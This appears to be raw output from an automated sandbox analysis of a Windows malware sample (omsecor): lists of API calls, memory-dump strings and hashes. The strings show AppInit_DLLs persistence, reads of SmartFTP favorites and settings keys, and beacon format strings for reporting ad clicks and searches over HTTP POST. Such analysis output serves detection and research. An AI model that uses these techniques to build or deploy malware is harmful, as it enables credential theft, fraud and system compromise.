                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • 0, xrefs: 0040AA5B
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • personal favorites, xrefs: 00405176
                          • folder, xrefs: 00405184
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
